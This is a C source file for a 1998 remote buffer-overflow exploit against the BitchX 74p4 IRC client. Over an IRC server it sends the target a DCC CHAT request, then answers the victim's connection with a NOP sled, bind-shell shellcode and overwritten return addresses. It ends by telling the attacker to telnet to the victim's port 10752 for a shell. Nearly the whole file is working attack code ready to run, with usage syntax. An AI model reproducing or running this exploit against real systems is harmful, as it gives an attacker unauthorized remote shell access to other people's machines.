/*
 * BitchX 74p4 remote overflow
 * BiT '98, shellcode by plaguez/ndubee
 *
 * Vulnerability originally discovered by nyt (nyt@deadpig.org),
 * rediscovered by an unknown user.
 */

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/in.h>

#define PORT 6667
#define BUFSIZE 2068

char *ops =
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89"
"\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe"
"\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66"
"\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10"
"\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66"
"\xb3\x04\xcd\x80\xeb\x04\xeb\x4a\xeb\x50\x31\xc0\x89\x46\x04\x89"
"\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80"
"\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb8\x2f\x62\x69"
"\x6e\x89\x06\xb8\x2f\x73\x68\x21\x89\x46\x04\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5d\xff\xff\xff";

void main(int argc, char **argv)
{
  char *p, *q, i = 0;
  int *addr, len = BUFSIZE + (char) 2*sizeof(char *);
  int base   = 0xBFFFF5C6;
  int offset = 0;
  
  if(argc < 3)
    printf("Syntax: %s <nick>@<server> <myip>\n", *argv), exit(0);
 
  if(argc > 3)
    offset = atoi(argv[3]);
 
  if(!strchr(argv[1], '@'))
    printf("Syntax: %s <nick>@<server> <myip>\n", *argv), exit(0);

  q = p = (char *) malloc(1 + len);
  memset(p, 0x90, 1 + len);
  
  for(q = (p + BUFSIZE - strlen(ops)); *ops; *q++ = *ops++) 
    ;
  
  for(addr = (int *) q; i < 2*sizeof(char *); i += 4)
    *(addr++) = base - offset;  
  
  *(q + i++) = '\n';
  *(q + i) = '\0';
  
  printf("Attacking.. %d using %X[%d]\n", strlen(p), base - offset, offset);
  fflush(stdout);

  attack(argv[1],argv[2], p);
  free(p);
}

void attack(char *stuff, char *ip, char *b)
{
  int s, l, a, i = sizeof(struct sockaddr_in), pp;
  struct sockaddr_in sin;
  char buf[512], *ser;
  unsigned long int ll;
  
  ser = strchr(stuff, '@');
  *ser++ = '\0';

  sin.sin_family = AF_INET;
  sin.sin_port   = htons(PORT);
  sin.sin_addr.s_addr = inet_addr(ser);

  ll		 = htonl(inet_addr(ip));
  srand(time(NULL));
  pp = rand();

  
  s = socket(AF_INET, SOCK_STREAM, 0);
  if(connect(s, &sin, sizeof(sin)) == -1)
    printf("Can't connect to ircserver\n"), exit(0);
  
  strcpy(buf, "USER A A A A\n");
  write(s, buf, strlen(buf));
  strcpy(buf, "NICK _bit_\n");
  write(s, buf, strlen(buf));
  sprintf(buf, "PRIVMSG %s :%cDCC CHAT chat %u %d%c\n", stuff, '\001', ll,
  		pp, '\001');
  write(s, buf, strlen(buf));

  sin.sin_port = htons(pp);
  sin.sin_addr.s_addr = INADDR_ANY;
  
  l = socket(AF_INET, SOCK_STREAM, 0);
  bind(l, &sin, sizeof(sin));
  listen(l, 5);
  
  printf("Wating for connection..."); fflush(stdout);

  a = accept(l, &sin, &i);
  
  write(a, b, strlen(b));
  sleep(1);
  
  close(s);
  close(l);
  close(a);
  
  printf("now telnet to %s's ip port 10752\n", stuff);
}